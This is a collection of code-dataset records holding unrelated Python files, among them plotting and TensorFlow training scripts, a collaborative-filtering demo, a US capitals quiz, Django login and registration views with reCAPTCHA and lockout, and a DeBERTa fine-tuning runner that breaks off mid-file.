Project/Wrappers/Kinect_Tracking.py","file_name":"Kinect_Tracking.py","file_ext":"py","file_size_in_byte":25754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"202733693","text":"# Standard Python modules used in HeighHo\nfrom HeighHoPy import *\n\n# HeighHo modules\nfrom Constants.all import X, Y, Z, L, R\nfrom Discretization.all import *\nfrom Display.all import *\nfrom Operators.all import *\n\n#==========================================================================\ndef plot_isolines(phi, xyzn, d, title):\n#--------------------------------------------------------------------------\n \n # Unpack tuples\n xn, yn, zn = xyzn \n \n # Pick coordinates for plotting (xp, yp) and values for plotting\n if d == X:\n ip = ceil(xn.size/2)\n xp, yp = meshgrid(yn, zn)\n zp = transpose(phi[ip,:,:], (1,0))\n xlab = \"y\"\n ylab = \"z\"\n \n elif d == Y:\n jp = ceil(yn.size/2)\n xp, yp = meshgrid(xn, zn)\n zp = transpose(phi[:,jp,:], (1,0))\n xlab = \"x\"\n ylab = \"z\"\n \n elif d == Z:\n kp = ceil(zn.size/2)\n xp, yp = meshgrid(xn, yn)\n zp = transpose(phi[:,:,kp], (1,0))\n xlab = \"x\"\n ylab = \"y\"\n\n # Set levels and normalize the colors \n levels = linspace( zp.min(), zp.max(), 21)\n norm = cm.colors.Normalize( vmax=zp.max(), vmin=zp.min() )\n \n plt.figure()\n plt.gca(aspect='equal')\n plt.contour(xp,yp,zp, levels, cmap=plt.cm.rainbow, norm=norm)\n plt.axis( [xp.min(), xp.max(), yp.min(), yp.max()] )\n plt.xlabel(xlab)\n plt.ylabel(ylab)\n plt.title(title)\n plt.grid()\n plt.show()\n\n return # end of function","sub_path":"PYTHON/Display/plot_isolines.py","file_name":"plot_isolines.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"602892161","text":"import tensorflow as tf\nimport numpy as np\nimport cv2 as cv\nimport random\nimport math\nfrom sklearn.utils import shuffle\nimport pdb\nimport re\nimport data_reader as reader\n\nimport networks as nets\nimport utils\nimport params\n\nSHOW_IMAGES = False \nIS_RESTORE = tf.train.latest_checkpoint(params.folder_data) != None \n \nparams.show_params() \ndata_reader = reader.DataReader('./data/train', './data/validation', './data/test')\n \t \n# training \ndim_depth = int(data_reader.dim_depth / params.scale)\n\nbatch_size = 32\n\ninput = tf.placeholder(tf.float32, (batch_size, data_reader.dim_patch, dim_depth, params.num_channels), name='input')\ntarget = tf.placeholder(tf.float32, (batch_size, data_reader.dim_patch, data_reader.dim_depth, params.num_channels), name='target') \n \noutput = params.network_architecture_D(input, params.kernel_size) \nprint('output shape is ', output.shape)\nif(params.LOSS == params.L1_LOSS): # \n\tloss = tf.reduce_mean(tf.abs(output - target)) \nif(params.LOSS == params.L2_LOSS):\n\tloss = tf.reduce_mean(tf.square(output - target)) \n\t \nglobal_step = tf.Variable(0, trainable=False)\nstarter_learning_rate = params.learning_rate \nlearning_rate = tf.train.exponential_decay(starter_learning_rate, global_step,\n 100, 1, staircase=True)\nopt = tf.train.AdamOptimizer(learning_rate).minimize(loss, global_step=global_step)\n\nconfig = tf.ConfigProto(\n device_count = {'GPU': 1}\n ) \nsess = tf.Session(config = config)\nsess.run(tf.global_variables_initializer()) \n\ntotal_loss_placeholder = tf.placeholder(tf.float32, shape=[], name=\"total_loss\")\nlr_placeholder = tf.placeholder(tf.float32, shape=[], name=\"total_loss\")\nssim_placeholder = tf.placeholder(tf.float32, shape=[], name=\"ssim_placeholder\")\npsnr_placeholder = tf.placeholder(tf.float32, shape=[], name=\"psnr_placeholder\")\ntf.summary.scalar('loss', total_loss_placeholder) \ntf.summary.scalar('learning_rate', lr_placeholder) \ntf.summary.scalar('ssim', ssim_placeholder) \ntf.summary.scalar('psnr', psnr_placeholder) \nmerged = tf.summary.merge_all()\nwriter = tf.summary.FileWriter('train.log', sess.graph)\n \nsaver = tf.train.Saver(max_to_keep=0) \nstart_epoch = 0\n\nif(IS_RESTORE):\n print('===========restoring from ' + tf.train.latest_checkpoint(params.folder_data))\n saver.restore(sess,tf.train.latest_checkpoint(params.folder_data))\n start_epoch = re.findall(r'\\d+', tf.train.latest_checkpoint(params.folder_data))\n start_epoch = int(start_epoch[0]) + 1 \n \nfor epoch in range(start_epoch, params.num_epochs):\n\tbatch_loss = 0 \n\tnum_images = 0 \n\tnum_iterations = math.ceil(data_reader.num_train_images/batch_size) \n\tssim_epoch = 0\n\tpsnr_epoch = 0 \n\tfor i in range(0, num_iterations): \n\t\t input_, target_ = data_reader.get_next_batch_train(i, batch_size) \n\t\t num_images += target_.shape[0]\n\t\t cost, _, lr, gl, predicted_images = sess.run([loss, opt, learning_rate, global_step, output], feed_dict={input: input_ , target: target_}) \n\t\t cv.imshow('i', input_[10] / 255) \n\t\t cv.imshow('t', target_[10] / 255) \n\t\t cv.imshow('o', predicted_images[10] / 255)\n\t\t cv.waitKey(1000)\n\t\t batch_loss += cost * target_.shape[0]\n\t\t ssim_batch, psnr_batch = utils.compute_ssim_psnr_batch(predicted_images, target_)\n\t\t ssim_epoch += ssim_batch\n\t\t psnr_epoch += psnr_batch\n\t\t print(\"Epoch/Iteration/Global Iteration: {}/{}/{} ...\".format(epoch, i, gl),\"Training loss: {:.8f}\".format(batch_loss/(num_images*data_reader.dim_depth)), \"Learning rate: {:.8f}\".format(lr)) \n\t\t \n\tmerged_ = sess.run(merged, feed_dict={total_loss_placeholder: batch_loss/(num_images*data_reader.dim_depth), ssim_placeholder: ssim_epoch/num_images, psnr_placeholder: psnr_epoch/num_images, lr_placeholder : lr } )\n\twriter.add_summary(merged_, epoch)\n\t \n\tprint('saving checkpoint...') \n\tsaver.save(sess, params.folder_data + params.ckpt_name + str(epoch))\t\n\nsess.close()","sub_path":"cnn/D-resize/old_code/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"600237059","text":"import numpy as np\nimport math\n\n# 基于用户的过滤\n'''\n用户 - 物品矩阵\n表示 N 个用户对M件物品的喜欢程度矩阵\ni: 用户数量 j: 物品数量\n'''\nUser = 4\nGoods = 3\n\narr1 = np.array([0.11, 0.20, 0.0]) # 用户1对物品的喜爱程度\narr2 = np.array([0.81, 0.0, 0.0]) # 用户2对物品的喜爱程度\narr3 = np.array([0.0, 0.88, 0.74]) # 用户3对物品的喜爱程度\narr4 = np.array([0.0, 0.0, 0.42]) # 用户4对物品的喜爱程度\n\n# '用户-物品'喜爱度矩阵\nx = np.full([User, Goods], [arr1, arr2, arr3, arr4], dtype=float)\n# 对'用户-物品'喜欢矩阵增加0,为了后面和us进行点乘\n# xten = np.full([User, User], [np.concatenate((arr1, [0])), np.concatenate((arr2, [0])), np.concatenate((arr3, [0])), np.concatenate((arr4, [0]))], dtype=float)\n# x的转置矩阵,转置矩阵的意义得到其他用户对物品的喜爱,和原先的用户进行相似度计算\nxT = x.transpose()\nprint(xT)\n\n# 物品对物品\ny = np.dot(xT, x)\nprint(y)\n\n# 用户相似矩阵\nus = np.full([Goods, Goods], 0.0, dtype=float)\n\n# 受用y来计算us,通过计算当前(i,j)的对角线,得到两两的相似度\nfor i in range(Goods):\n for j in range(Goods):\n us[i][j] = round(y[i][j] / (math.sqrt(y[i][i]) * math.sqrt(y[j][j])), 3)\n \nprint(us)\n\n# 用户相似矩阵 乘以 原来的喜爱度矩阵。就可以得到是否当前用户喜欢的物品,其他用户也喜欢\nusp = y / us\nprint(usp)\n\nusSum = np.sum(us, axis=1)\n\n# 用于归一化\nusr = np.full((Goods, Goods), [[usSum[0]], [usSum[1]], [usSum[2]]])\nprint(usr)\n\n# 归一化后的喜爱矩阵。这样就可以通过x(已知的喜爱度剧组)预测到其他用户也喜欢的矩阵\np = usp / usr\nprint(p)","sub_path":"linear_algebra/demo_collaborative_filtering_2.py","file_name":"demo_collaborative_filtering_2.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"93337460","text":"\"\"\"\n2. Capital Quiz\nWrite a program that creates a dictionary containing the U.S. states as keys and their capitals as values. \n(Use the Internet to get a list of the states and their capitals.) The program\nshould then randomly quiz the user by displaying the name of a state and asking the user\nto enter that state’s capital. The program should keep a count of the number of correct and\nincorrect responses. (As an alternative to the U.S. states, the program can use the names of\ncountries and their capitals.)\n\"\"\"\n# import libraries\nimport random\n\n# define a dictionary of states and their respective capitals\ncapital_dic={\n 'Alabama': 'Montgomery',\n 'Alaska': 'Juneau',\n 'Arizona':'Phoenix',\n 'Arkansas':'Little Rock',\n 'California': 'Sacramento',\n 'Colorado':'Denver',\n 'Connecticut':'Hartford',\n 'Delaware':'Dover',\n 'Florida': 'Tallahassee',\n 'Georgia': 'Atlanta',\n 'Hawaii': 'Honolulu',\n 'Idaho': 'Boise',\n 'Illinios': 'Springfield',\n 'Indiana': 'Indianapolis',\n 'Iowa': 'Des Monies',\n 'Kansas': 'Topeka',\n 'Kentucky': 'Frankfort',\n 'Louisiana': 'Baton Rouge',\n 'Maine': 'Augusta',\n 'Maryland': 'Annapolis',\n 'Massachusetts': 'Boston',\n 'Michigan': 'Lansing',\n 'Minnesota': 'St. Paul',\n 'Mississippi': 'Jackson',\n 'Missouri': 'Jefferson City',\n 'Montana': 'Helena',\n 'Nebraska': 'Lincoln',\n 'Neveda': 'Carson City',\n 'New Hampshire': 'Concord',\n 'New Jersey': 'Trenton',\n 'New Mexico': 'Santa Fe',\n 'New York': 'Albany',\n 'North Carolina': 'Raleigh',\n 'North Dakota': 'Bismarck',\n 'Ohio': 'Columbus',\n 'Oklahoma': 'Oklahoma City',\n 'Oregon': 'Salem',\n 'Pennsylvania': 'Harrisburg',\n 'Rhode Island': 'Providence',\n 'South Carolina': 'Columbia',\n 'South Dakoda': 'Pierre',\n 'Tennessee': 'Nashville',\n 'Texas': 'Austin',\n 'Utah': 'Salt Lake City',\n 'Vermont': 'Montpelier',\n 'Virginia': 'Richmond',\n 'Washington': 'Olympia',\n 'West Virginia': 'Charleston',\n 'Wisconsin': 'Madison',\n 'Wyoming': 'Cheyenne' \n}\n### initialize variables\nuser_input = \"\" # guess from user\nnum_wrong = 0 # number of questions answered incorrectly\nnum_right = 0 # number of questions answered correctly\n\n# create while loop to loop through the states\nwhile len(capital_dic) > 0:\n # get a random state from the capital_dic dictionary\n state = random.choice(list(capital_dic.keys()))\n \n # prompt user to enter the capital of the randomly picked state\n user_input = input(f'What is the capital of {state}: ')\n \n # if user guess is correct, increase num_right by 1\n if user_input == capital_dic[state]:\n print(\"Correct!\")\n num_right += 1\n else: # increase num_wrong by 1\n print(\"Incorrect!\")\n num_wrong += 1\n \n # remove the state from the capital_dic dictionary so it cannot be chosen again\n del capital_dic[state]\n\n# print out the number right and the number wrong\nprint(f'You got {num_right} right and {num_wrong} wrong!')","sub_path":"Class_Practice_Exercises/Dictionaries_Sets/Dict_Set_Ex_2.py","file_name":"Dict_Set_Ex_2.py","file_ext":"py","file_size_in_byte":3017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"131168072","text":"class Student:\n def __init__(self, name, college_id, gpa):\n self.name = name\n self.college_id = college_id\n self.gpa = gpa\n\n def __str__(self):\n return f'Name: {self.name}, id: {self.college_id}, GPA: {self.gpa}'\n\ndef main():\n alice = Student('Alice', 'aa1234aa', 4.0)\n bob = Student('Bob', 'bb1234bb', 3.5)\n jim = Student('Jim', 'cc1234cc', 3.0)\n\n print (alice.name)\n print(bob.college_id)\n print(jim.gpa)\n\n print(alice)\n print(bob)\n print(jim)\n\nmain()\n","sub_path":"classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"285996473","text":"from time import time\nstart = time()\n\nimport numpy as np\nimport os\n\nfrom tqdm import tqdm\nimport datetime\n\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import f1_score\nfrom sklearn.metrics import confusion_matrix\nimport logging\n\nfrom classifiers import *\nfrom FeatureSelection import *\n\nnp.random.seed(0)\n\ntry:\n data = np.load(\"../Data/vectorized_data.npz\")\nexcept:\n os.system(\"python clean_data.py\")\n data = np.load(\"../Data/vectorized_data\")\n\ntrain_tfidf,train_labels = data['arr_0'], data['arr_1']\n\n# Import PC\ntrain_PC = np.load(\"data_dump/train_data_tfidf_PC_2343.npy\")\n\ntrain_PC = train_tfidf\n\nvalidation_PC = train_PC[-400:,:]\nval_labels = train_labels[-400:]\n\ntrain_PC = train_PC[:-400,:]\ntrain_labels = train_labels[:-400]\n\n# Experiment details\nos.chdir(\"log/\")\n\nfeature_selection = 'None'\nalgorithm = 'GNB'\nruntime = 'Gaussian Naive Bayes with default parameters. All features used.\\n \\\nValidation set has 400 points.'\n\nlog_name = 'GNB_'+str(datetime.datetime.now()).replace(' ','_')\\\n.replace(':','_').split(\".\")[0]+'.log'\n\nlogging.basicConfig(filename = log_name, level=logging.DEBUG)\nlogging.info('Feature_selection = ' + feature_selection)\nlogging.info('Algorithm = ' + algorithm)\nlogging.info('Runtime = ' + runtime)\n\n# Experiemnt code\nclassifier = GNB()\nclassifier.train(train_PC,train_labels)\n\ntrain_predict = classifier.predict(train_PC)\nval_predict = classifier.predict(validation_PC)\n\ntf1 = f1_score(train_labels,train_predict,average='macro')\nvf1 = f1_score(val_labels,val_predict,average='macro')\n\nlogging.info('Train F1 = {} \\t Validation F1 = {}'.format(tf1,vf1))\n\nlogging.info(\"Time to run : {} s.\".format(time()-start))\n","sub_path":"project/Analysis/src/experiments_gnb.py","file_name":"experiments_gnb.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"466240688","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('game', '0007_auto_20150324_0227'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='game',\n name='gameCreator',\n field=models.TextField(default=None, null=True),\n ),\n ]\n","sub_path":"GoFish/game/migrations/0008_auto_20150324_0237.py","file_name":"0008_auto_20150324_0237.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"538592870","text":"from django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import render, reverse, redirect\nfrom django.contrib.auth.views import login as login_view\nfrom django.contrib.auth import authenticate, login\nfrom .forms import UserCreationForm\nfrom .decorators import check_recaptcha\nfrom axes.models import AccessAttempt\nfrom axes.utils import reset\n\n\n# Create your views here.\n# def get_client_ip(req):\n# x_forwarded_for = req.META.get('HTTP_X_FORWARDED_FOR')\n# if x_forwarded_for:\n# print('HTTP_X_FORWARDED_FOR IP is {}'.format(x_forwarded_for))\n# return x_forwarded_for.split(',')[-1].strip()\n# elif req.META.get('HTTP_X_REAL_IP'):\n# real_ip = req.META.get('HTTP_X_REAL_IP')\n# print('HTTP_X_REAL_IP IP is {}'.format(real_ip))\n# return real_ip\n# else:\n# remote_addr = req.META.get('REMOTE_ADDR')\n# print('REMOTE_ADDR IP is {}'.format(remote_addr))\n# return remote_addr\n\ndef check_login_attempts(request):\n if request.method == 'POST':\n username = request.POST.get('username')\n attempts = AccessAttempt.objects.filter(\n username=username).first()\n if attempts is not None and attempts.failures_since_start >= 3:\n return JsonResponse({'captcha': True})\n return JsonResponse({'captcha': False})\n return HttpResponse(status=405)\n\n\n@check_recaptcha\ndef user_login(request):\n if request.method == 'GET':\n return render(request, 'budget_auth_app/login.html')\n if request.method == 'POST':\n user = authenticate(username=request.POST.get('username'),\n password=request.POST.get('password'))\n if request.POST.get(\n 'g-recaptcha-response') and request.recaptcha_is_valid:\n if not request.POST.get('remember'):\n request.session.set_expiry(0)\n if user is not None:\n reset(username=request.POST.get('username'))\n return login_view(request,\n template_name='budget_auth_app/login.html')\n elif request.POST.get(\n 'g-recaptcha-response') is not None and\\\n not request.recaptcha_is_valid:\n captcha_error = 'Ошибка при валидации reCAPTCHA, попробуйте снова'\n user_axes = AccessAttempt.objects.get(\n username=request.POST.get('username'))\n attempts = user_axes.failures_since_start\n # increase login attempts\n user_axes.failures_since_start = attempts + 1\n user_axes.save()\n if user_axes.failures_since_start >= 10:\n return redirect(reverse('auth:locked'))\n return render(request, 'budget_auth_app/login.html',\n {'captcha_error': captcha_error})\n else:\n if not request.POST.get('remember'):\n request.session.set_expiry(0)\n if user is not None:\n reset(username=request.POST.get('username'))\n return login_view(request,\n template_name='budget_auth_app/login.html')\n return HttpResponse(status=405)\n\n\n# ToDo Add link for password reinstatement in the login form\n\n@check_recaptcha\ndef user_registration(request):\n if request.method == 'GET':\n return render(request, 'budget_auth_app/register.html')\n if request.method == 'POST':\n form = UserCreationForm(request.POST)\n if form.is_valid() and request.recaptcha_is_valid:\n form.save()\n user = authenticate(username=form.cleaned_data['email'],\n password=form.cleaned_data['password1'])\n login(request, user)\n if not request.POST.get('remember'):\n request.session.set_expiry(0)\n return redirect(reverse('budget:main'))\n if not request.recaptcha_is_valid:\n captcha_error = 'Ошибка при валидации reCAPTCHA, попробуйте снова'\n return render(request, 'budget_auth_app/register.html',\n {'captcha_error': captcha_error})\n print(form.errors.values())\n return render(request, 'budget_auth_app/register.html',\n {'errors': form.errors.values()})\n return HttpResponse(status=405)\n\n\ndef user_locked(request):\n if request.method == 'GET':\n return render(request, 'budget_auth_app/locked.html')\n return HttpResponse(status=405)\n","sub_path":"budget_auth_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"261939678","text":"# Copyright (c) Microsoft, Inc. 2020\n#\n# This source code is licensed under the MIT license found in the\n# LICENSE file in the root directory of this source tree.\n#\n# Author: penhe@microsoft.com\n# Date: 01/25/2020\n#\n\n\"\"\"DeBERTa finetuning runner.\"\"\"\n\nimport os\nfrom collections import OrderedDict, Mapping, Sequence\nimport argparse\nimport random\nimport time\n\nimport numpy as np\nimport math\nimport torch\nimport json\nfrom torch.utils.data import DataLoader\nfrom ..deberta import GPT2Tokenizer\nfrom ..utils import *\nfrom ..utils import xtqdm as tqdm\nfrom .task_registry import tasks\n\nfrom ..training import DistributedTrainer, initialize_distributed, batch_to, set_random_seed,kill_children\nfrom ..data import DistributedBatchSampler, SequentialSampler, BatchSampler, AsyncDataLoader\n\ndef create_model(args, num_labels, model_class_fn):\n # Prepare model\n rank = getattr(args, 'rank', 0)\n init_model = args.init_model if rank<1 else None\n model = model_class_fn(init_model, args.model_config, num_labels=num_labels, \\\n drop_out=args.cls_drop_out, \\\n pre_trained = args.pre_trained)\n if args.fp16:\n model = model.half()\n\n return model\n\ndef train_model(args, model, device, train_data, eval_data):\n total_examples = len(train_data)\n num_train_steps = int(len(train_data)*args.num_train_epochs / args.train_batch_size)\n logger.info(\" Training batch size = %d\", args.train_batch_size)\n logger.info(\" Num steps = %d\", num_train_steps)\n\n def data_fn(trainer):\n return train_data, num_train_steps, None\n\n def eval_fn(trainer, model, device, tag):\n results = run_eval(trainer.args, model, device, eval_data, tag, steps=trainer.trainer_state.steps)\n eval_metric = np.mean([v[0] for k,v in results.items() if 'train' not in k])\n return eval_metric\n\n def loss_fn(trainer, model, data):\n _, loss = model(**data)\n return loss.mean(), data['input_ids'].size(0)\n\n trainer = DistributedTrainer(args, model, device, data_fn, loss_fn = loss_fn, eval_fn = eval_fn, dump_interval = args.dump_interval)\n trainer.train()\n\ndef merge_distributed(data_list, max_len=None):\n merged = []\n def gather(data):\n data_chunks = [torch.zeros_like(data) for _ in range(args.world_size)]\n torch.distributed.all_gather(data_chunks, data)\n torch.cuda.synchronize()\n return data_chunks\n\n for data in data_list:\n if torch.distributed.is_initialized() and torch.distributed.get_world_size()>1:\n if isinstance(data, Sequence):\n data_chunks = []\n for d in data:\n chunks_ = gather(d)\n data_ = torch.cat(chunks_)\n data_chunks.append(data_)\n merged.append(data_chunks)\n else:\n data_chunks = gather(data)\n merged.extend(data_chunks)\n else:\n merged.append(data)\n if not isinstance(merged[0], Sequence):\n merged = torch.cat(merged)\n if max_len is not None:\n return merged[:max_len]\n else:\n return merged\n else:\n data_list=[]\n for d in zip(*merged):\n data = torch.cat(d)\n if max_len is not None:\n data = data[:max_len]\n data_list.append(data)\n return data_list\n\ndef calc_metrics(predicts, labels, eval_loss, eval_item, eval_results, args, name, prefix, steps, tag):\n tb_metrics = OrderedDict()\n result=OrderedDict()\n metrics_fn = eval_item.metrics_fn\n predict_fn = eval_item.predict_fn\n if metrics_fn is None:\n eval_metric = metric_accuracy(predicts, labels)\n else:\n metrics = metrics_fn(predicts, labels)\n result.update(metrics)\n critial_metrics = set(metrics.keys()) if eval_item.critial_metrics is None or len(eval_item.critial_metrics)==0 else eval_item.critial_metrics\n eval_metric = np.mean([v for k,v in metrics.items() if k in critial_metrics])\n result['eval_loss'] = eval_loss\n result['eval_metric'] = eval_metric\n result['eval_samples'] = len(labels)\n if args.rank<=0:\n output_eval_file = os.path.join(args.output_dir, \"eval_results_{}_{}.txt\".format(name, prefix))\n with open(output_eval_file, 'w', encoding='utf-8') as writer:\n logger.info(\"***** Eval results-{}-{} *****\".format(name, prefix))\n for key in sorted(result.keys()):\n logger.info(\" %s = %s\", key, str(result[key]))\n writer.write(\"%s = %s\\n\" % (key, str(result[key])))\n tb_metrics[f'{name}/{key}'] = result[key]\n\n if predict_fn is not None:\n predict_fn(predicts, args.output_dir, name, prefix)\n else:\n output_predict_file = os.path.join(args.output_dir, \"predict_results_{}_{}.txt\".format(name, prefix))\n np.savetxt(output_predict_file, predicts, delimiter='\\t')\n output_label_file = os.path.join(args.output_dir, \"predict_labels_{}_{}.txt\".format(name, prefix))\n np.savetxt(output_label_file, labels, delimiter='\\t')\n\n if not eval_item.ignore_metric:\n eval_results[name]=(eval_metric, predicts, labels)\n _tag = tag + '/' if tag is not None else ''\n def _ignore(k):\n ig = ['/eval_samples', '/eval_loss']\n for i in ig:\n if k.endswith(i):\n return True\n return False\n\ndef run_eval(args, model, device, eval_data, prefix=None, tag=None, steps=None):\n # Run prediction for full data\n prefix = f'{tag}_{prefix}' if tag is not None else prefix\n eval_results=OrderedDict()\n eval_metric=0\n no_tqdm = (True if os.getenv('NO_TQDM', '0')!='0' else False) or args.rank>0\n for eval_item in eval_data:\n name = eval_item.name\n eval_sampler = SequentialSampler(len(eval_item.data))\n batch_sampler = BatchSampler(eval_sampler, args.eval_batch_size)\n batch_sampler = DistributedBatchSampler(batch_sampler, rank=args.rank, world_size=args.world_size)\n eval_dataloader = DataLoader(eval_item.data, batch_sampler=batch_sampler, num_workers=args.workers)\n model.eval()\n eval_loss, eval_accuracy = 0, 0\n nb_eval_steps, nb_eval_examples = 0, 0\n predicts=[]\n labels=[]\n for batch in tqdm(AsyncDataLoader(eval_dataloader), ncols=80, desc='Evaluating: {}'.format(prefix), disable=no_tqdm):\n batch = batch_to(batch, device)\n with torch.no_grad():\n logits, tmp_eval_loss = model(**batch)\n label_ids = batch['labels'].to(device)\n predicts.append(logits)\n labels.append(label_ids)\n eval_loss += tmp_eval_loss.mean().item()\n input_ids = batch['input_ids']\n nb_eval_examples += input_ids.size(0)\n nb_eval_steps += 1\n\n eval_loss = eval_loss / nb_eval_steps\n predicts = merge_distributed(predicts, len(eval_item.data))\n labels = merge_distributed(labels, len(eval_item.data))\n if isinstance(predicts, Sequence):\n for k,pred in enumerate(predicts):\n calc_metrics(pred.detach().cpu().numpy(), labels.detach().cpu().numpy(), eval_loss, eval_item, eval_results, args, name + f'@{k}', prefix, steps, tag)\n else:\n calc_metrics(predicts.detach().cpu().numpy(), labels.detach().cpu().numpy(), eval_loss, eval_item, eval_results, args, name, prefix, steps, tag)\n\n return eval_results\n\ndef run_predict(args, model, device, eval_data, prefix=None):\n # Run prediction for full data\n eval_results=OrderedDict()\n eval_metric=0\n for eval_item in eval_data:\n name = eval_item.name\n eval_sampler = SequentialSampler(len(eval_item.data))\n batch_sampler = BatchSampler(eval_sampler, args.eval_batch_size)\n batch_sampler = DistributedBatchSampler(batch_sampler, rank=args.rank, world_size=args.world_size)\n eval_dataloader = DataLoader(eval_item.data, batch_sampler=batch_sampler, num_workers=args.workers)\n model.eval()\n predicts=None\n for batch in tqdm(AsyncDataLoader(eval_dataloader), ncols=80, desc='Evaluating: {}'.format(prefix), disable=args.rank>0):\n batch = batch_to(batch, device)\n with torch.no_grad():\n logits, _ = model(**batch)\n if args.world_size>1:\n logits_all = [torch.zeros_like(logits) for _ in range(args.world_size)]\n torch.distributed.all_gather(logits_all, logits)\n torch.cuda.synchronize()\n logits = torch.cat(logits_all)\n logits = logits.detach().cpu().numpy()\n if predicts is None:\n predicts = np.copy(logits)\n else:\n predicts = np.append(predicts, logits, axis=0)\n \n predicts = predicts[:len(eval_item.data)]\n if args.rank<=0:\n output_test_file = os.path.join(args.output_dir, \"test_logits_{}_{}.txt\".format(name, prefix))\n logger.info(\"***** Dump prediction results-{}-{} *****\".format(name, prefix))\n logger.info(\"Location: {}\".format(output_test_file))\n np.savetxt(output_test_file, predicts, delimiter='\\t')\n predict_fn = eval_item.predict_fn\n if predict_fn:\n predict_fn(predicts, args.output_dir, name, prefix)\n\ndef main(args):\n if not args.do_train and not args.do_eval and not args.do_predict:\n raise ValueError(\"At least one of `do_train` or `do_eval` or `do_predict` must be True.\")\n os.makedirs(args.output_dir, exist_ok=True)\n task_name = args.task_name.lower()\n random.seed(args.seed)\n np.random.seed(args.seed)\n torch.manual_seed(args.seed)\n\n tokenizer = GPT2Tokenizer()\n processor = tasks[task_name](tokenizer = tokenizer, max_seq_len = args.max_seq_length, data_dir = args.data_dir)\n label_list = processor.get_labels()\n\n eval_data = processor.eval_data(max_seq_len=args.max_seq_length)\n logger.info(\" Evaluation batch size = %d\", args.eval_batch_size)\n if args.do_predict:\n test_data = processor.test_data(max_seq_len=args.max_seq_length)\n logger.info(\" Prediction batch size = %d\", args.predict_batch_size)\n\n if args.do_train:\n train_data = processor.train_data(max_seq_len=args.max_seq_length, mask_gen = None, debug=args.debug)\n model_class_fn = processor.get_model_class_fn()\n model = create_model(args, len(label_list), model_class_fn)\n if args.do_train:\n with open(os.path.join(args.output_dir, 'model_config.json'), 'w', encoding='utf-8') as fs:\n fs.write(model.config.to_json_string() + '\\n')\n logger.info(\"Model config {}\".format(model.config))\n device = initialize_distributed(args)\n if not isinstance(device, torch.device):\n return 0\n model.to(device)\n if args.do_eval:\n run_eval(args, model, device, eval_data, prefix=args.tag)\n\n if args.do_train:\n train_model(args, model, device, train_data, eval_data)\n\n if args.do_predict:\n run_predict(args, model, device, test_data, prefix=args.tag)\n\ndef build_argument_parser():\n parser = argparse.ArgumentParser()\n\n ## Required parameters\n parser.add_argument(\"--data_dir\",\n default=None,\n type=str,\n required=True,\n help=\"The input data dir. Should contain the .tsv files (or other data files) for the task.\")\n parser.add_argument(\"--task_name\",\n default=None,\n type=str,\n required=True,\n help=\"The name of the task to train.\")\n parser.add_argument(\"--output_dir\",\n default=None,\n type=str,\n required=True,\n help=\"The output directory where the model checkpoints will be written.\")\n\n ## Other parameters\n parser.add_argument(\"--max_seq_length\",\n default=128,\n type=int,\n help=\"The maximum total input sequence length after WordPiece tokenization. \\n\"\n \"Sequences longer than this will be truncated, and sequences shorter \\n\"\n \"than this will be padded.\")\n parser.add_argument(\"--do_train\",\n default=False,\n action='store_true',\n help=\"Whether to run training.\")\n parser.add_argument(\"--do_eval\",\n default=False,\n action='store_true',\n help=\"Whether to run eval on the dev set.\")\n parser.add_argument(\"--do_predict\",\n default=False,\n action='store_true',\n help=\"Whether to run prediction on the test set.\")\n parser.add_argument(\"--train_batch_size\",\n default=32,\n type=int,\n help=\"Total batch size for training.\")\n parser.add_argument(\"--eval_batch_size\",\n default=32,\n type=int,\n help=\"Total batch size for eval.\")\n parser.add_argument(\"--predict_batch_size\",\n default=32,\n type=int,\n help=\"Total batch size for prediction.\")\n parser.add_argument(\"--max_grad_norm\",\n default=1,\n type=float,\n help=\"The clip threshold of global gradient norm\")\n parser.add_argument(\"--learning_rate\",\n default=5e-5,\n type=float,\n help=\"The initial learning rate for Adam.\")\n parser.add_argument(\"--epsilon\",\n default=1e-6,\n type=float,\n help=\"epsilon setting for Adam.\")\n parser.add_argument(\"--adam_beta1\",\n default=0.9,\n type=float,\n help=\"The beta1 parameter for Adam.\")\n parser.add_argument(\"--adam_beta2\",\n default=0.999,\n type=float,\n help=\"The beta2 parameter for Adam.\")\n parser.add_argument(\"--num_train_epochs\",\n default=3.0,\n type=float,\n help=\"Total number of training epochs to perform.\")\n parser.add_argument(\"--warmup_proportion\",\n default=0.1,\n type=float,\n help=\"Proportion of training to perform linear learning rate warmup for. \"\n \"E.g., 0.1 = 10%% of training.\")\n parser.add_argument(\"--lr_schedule_ends\",\n default=0,\n type=float,\n help=\"The ended learning rate scale for learning rate scheduling\")\n parser.add_argument(\"--lr_schedule\",\n default='warmup_linear',\n type=str,\n help=\"The learning rate scheduler used for traning. \"\n \"E.g. warmup_linear, warmup_linear_shift, warmup_cosine, warmup_constant. Default, warmup_linear\")\n\n parser.add_argument(\"--local_rank\",\n type=int,\n default=-1,\n help=\"local_rank for distributed training on gpus\")\n\n parser.add_argument('--seed',\n type=int,\n default=1234,\n help=\"random seed for initialization\")\n\n parser.add_argument('--accumulative_update',\n type=int,\n default=1,\n help=\"Number of updates steps to accumulate before 